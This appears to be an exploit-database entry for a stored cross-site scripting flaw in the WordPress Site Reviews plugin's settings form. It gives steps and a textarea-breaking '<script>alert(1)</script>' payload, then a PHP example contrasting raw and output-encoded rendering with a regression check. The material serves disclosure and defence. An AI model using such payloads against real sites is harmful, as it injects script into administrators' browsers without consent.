## https://sploitus.com/exploit?id=WPEX-ID:4AE6BF90-B100-4BB5-BDD7-8ACDBD950596
1. Log in as Admin.
2. Go to http://vulnerable-site.tld/wp-admin/edit.php?post_type=site-review&page=glsr-settings&tab=general
3. Make some changes in the `schema` tab and intercept the request.
4. The form will have the parameter `site_reviews_v6[settings][general][notification_message]`.
5. Insert the following payload in it:
```
<strong>A new {review_rating}-star review has been submitted:</strong>
</textarea><script>alert(1)</script>
{review_title}

{review_content}

{review_author} <{review_email}> - {review_ip}

{review_link}
```
6. Hit send. The XSS payload will be saved and will be triggered whenever the settings page is opened.
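
The `</textarea>` at the start of the payload's second line suggests the saved value is echoed back into the settings form's `<textarea>` without output encoding. The following is an added example, not the plugin's code or its actual fix: it contrasts that raw rendering with an output-encoded one and adds a regression check, using hypothetical function names and an abridged copy of the payload above as sample input.

```php
<?php
// Added example; not the plugin's code. Function names are hypothetical.

// Constructed sample: the stored setting value from the steps above (abridged).
$stored = "<strong>A new {review_rating}-star review has been submitted:</strong>\n"
        . "</textarea><script>alert(1)</script>\n"
        . "{review_title}";

// Vulnerable pattern: the saved value is echoed raw between <textarea> tags,
// so a literal </textarea> inside the value ends the element early.
function render_setting_raw(string $name, string $value): string
{
    return '<textarea name="' . $name . '">' . $value . '</textarea>';
}

// Generic HTML encoder used when the WordPress helpers are not loaded.
function escape_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hardened pattern: encode on output. Inside WordPress, esc_textarea() and
// esc_attr() are the core helpers; outside it, fall back to escape_html().
function render_setting_escaped(string $name, string $value): string
{
    $body = function_exists('esc_textarea') ? esc_textarea($value) : escape_html($value);
    $attr = function_exists('esc_attr') ? esc_attr($name) : escape_html($name);
    return '<textarea name="' . $attr . '">' . $body . '</textarea>';
}

// Regression check: the rendered field must contain exactly one closing
// textarea tag (the one the template wrote) and no script tag.
function field_is_contained(string $html): bool
{
    $lower = strtolower($html);
    return substr_count($lower, '</textarea') === 1
        && strpos($lower, '<script') === false;
}

$name = 'site_reviews_v6[settings][general][notification_message]';
foreach (['raw' => 'render_setting_raw', 'escaped' => 'render_setting_escaped'] as $label => $fn) {
    $html = $fn($name, $stored);
    printf("%-8s contained=%s\n", $label, field_is_contained($html) ? 'yes' : 'no');
}
```

Encoding on output keeps the administrator's template text intact in the database while the browser displays it as text inside the field.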